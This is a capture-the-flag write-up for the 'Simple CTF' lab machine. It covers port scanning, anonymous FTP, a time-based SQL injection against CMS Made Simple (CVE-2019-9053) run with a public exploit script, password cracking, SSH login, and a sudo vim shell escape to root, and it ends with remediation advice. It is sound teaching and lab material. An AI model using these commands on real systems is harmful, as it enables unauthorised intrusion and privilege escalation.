Target: simplectf.thm (Requires /etc/hosts or IP) Difficulty: Easy Objective: User (mitch) & Root (root.txt)

1. Executive Summary

“Simple CTF” is a Linux machine that exposes a vulnerable Content Management System (CMS Made Simple) on the web port. Initial access is achieved by exploiting a known SQL Injection (CVE-2019-9053) vulnerability to recover credentials. After cracking the password, access is gained via SSH on a non-standard port (2222). Privilege escalation allows the user to run Vim as root via sudo, which is exploited to spawn a root shell.

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): Nmap port scanning.
  • T1190 (Exploit Public-Facing App): SQL Injection in CMS Made Simple.
  • T1110 (Brute Force): Cracking MD5 password hashes.
  • T1548.003 (Sudo and Sudo Caching): Exploiting sudo rights on the vim binary.

2. Enumeration

A. Network Scanning

We start with a standard Nmap scan.

nmap -sC -sV -oN nmap/simple 10.10.x.x

Key Findings:

  • 21/tcp (FTP): vsftpd 3.0.3 (Anonymous Login Allowed).
  • 80/tcp (HTTP): Apache 2.4.18.
  • 2222/tcp (SSH): OpenSSH 7.2p2 (Note: Non-standard port).

B. FTP Enumeration

Since Anonymous login is enabled:

ftp 10.10.x.x
# Name: anonymous, Pass: <empty>
ls
get ForMitch.txt
  • Intel: The file ForMitch.txt mentions the user mitch and implies weak password policies.

C. Web Enumeration

  1. Directory Fuzzing: gobuster or feroxbuster finds a directory /simple.
  2. CMS Identification: Browsing to http://10.10.x.x/simple shows the “CMS Made Simple” login page.
  3. Version Detection: Scrolling to the footer of the page usually reveals the version.
  • Version: 2.2.8.

3. Initial Access: The SQL Injection

A. Vulnerability Research

We check searchsploit for the CMS version.

searchsploit "CMS Made Simple"
  • Result: CMS Made Simple < 2.2.10 - SQL Injection (CVE-2019-9053).

B. Exploitation (CVE-2019-9053)

This is a Time-Based SQL Injection that dumps the password hash and salt. We use the Python script (usually 46635.py) found in Exploit-DB.

Command:

python2 46635.py -u http://10.10.x.x/simple/ --crack -w /usr/share/wordlists/rockyou.txt

(Note: Modern python scripts for this might require specific dependencies, but the logic remains the same).

Results:

  • Salt: 1dac0d92e9fa6bb2
  • Username: mitch
  • Hash: 0c01f4468bd75d7a84c7eb73846e8d96
  • Cracked Password: secret

C. SSH Login

We use the cracked credentials to log in on the non-standard port.

ssh mitch@10.10.x.x -p 2222
# Password: secret

User Flag: user.txt in Mitch’s home directory.


4. Privilege Escalation: Sudo Vim

A. Enumeration

We check standard user privileges immediately.

sudo -l

Output:

User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

B. The Exploit (GTFOBins)

If we can run vim as root, we can spawn a shell from within it.

Command:

sudo vim -c ':!/bin/sh'
  • :!: Execute a shell command.
  • /bin/sh: The shell we want.

Result: We drop into a root shell.

# whoami
root

Root Flag: /root/root.txt.


5. Remediation (Blue Team)

  1. Patch Management: Upgrade “CMS Made Simple” to the latest version to patch the SQL Injection vulnerability.
  2. Sudo Configuration:
  • Avoid granting NOPASSWD sudo rights to text editors like vim, nano, or less, as they allow trivial shell escapes.
  • If editing root files is required, use sudoedit or grant access to a specific script that wraps the editor securely (though still risky).
  1. FTP Security: Disable Anonymous FTP access if it is not serving public data.
  2. SSH Security: While changing the port to 2222 reduces noise, it is “Security by Obscurity.” Enforce Key-Based Authentication.